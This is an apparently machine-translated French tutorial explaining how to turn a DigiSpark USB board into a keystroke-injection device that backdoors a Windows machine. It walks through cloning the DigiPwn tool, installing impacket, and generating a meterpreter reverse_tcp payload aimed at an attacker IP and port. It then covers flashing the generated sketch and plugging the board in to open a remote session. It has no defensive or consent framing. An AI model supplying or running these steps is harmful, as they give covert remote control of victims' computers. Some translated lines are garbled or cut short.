Table des matières:
2025 Auteur: John Day | [email protected]. Dernière modifié: 2025-01-13 06:57
Alors qu'est-ce qu'on fait ici ?
DigiSpark est un petit outil de développement basé sur Arduino qui peut agir comme une entrée de clavier HID. Aujourd'hui, nous manipulons cet appareil pour backdoor un système d'exploitation Windows !
Fournitures
IDE Arduino
Une machine Windows
DigiSpark
Cadre Metasploit
Python 2.7 (Remarque: vous avez besoin de python "2.7", ne choisissez aucune autre version)
taquet
Cerveau! Ça aide
Étape 1: Clonez le référentiel DigiPwn
Cloner vers le dépôt GitHub de DigiPwn par
git clone
Maintenant, changez de répertoire en DigiPwn en
cd DigiPwn/
Étape 2: Installez Impacket [Modules requis par Python]
Ce module est requis pour exécuter le serveur SMB qui est requis pour la bibliothèque de charge utile
sudo apt-get install python-impacket
Ou vous pouvez télécharger la bibliothèque impacket et l'installer à partir d'ici.
Étape 3: Générons la charge utile
Courir
python DigiPwn.py [HTE] [PORT] [CHARGE UTILE] [FICHIER DE SORTIE] [format]
ex
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Il vous sera maintenant demandé si vous souhaitez démarrer le serveur de transfert et le serveur SMB. Appuyez sur y et appuyez sur Entrée
Étape 4: Téléchargez maintenant le code sur Arduino
Avant de télécharger, nous devons nous assurer que la carte DigiSpark est installée dans Arduino pour le faire, regardez ici.
après cela, téléchargez le fichier keystroke_inject.ino généré par le script. Une fois terminé, vous êtes prêt à
Étape 5: Il est temps de brancher le bébé
Branchez votre DigiSpark maintenant et attendez 10 secondes
BOUM Il y a une session meterpreter ouverte !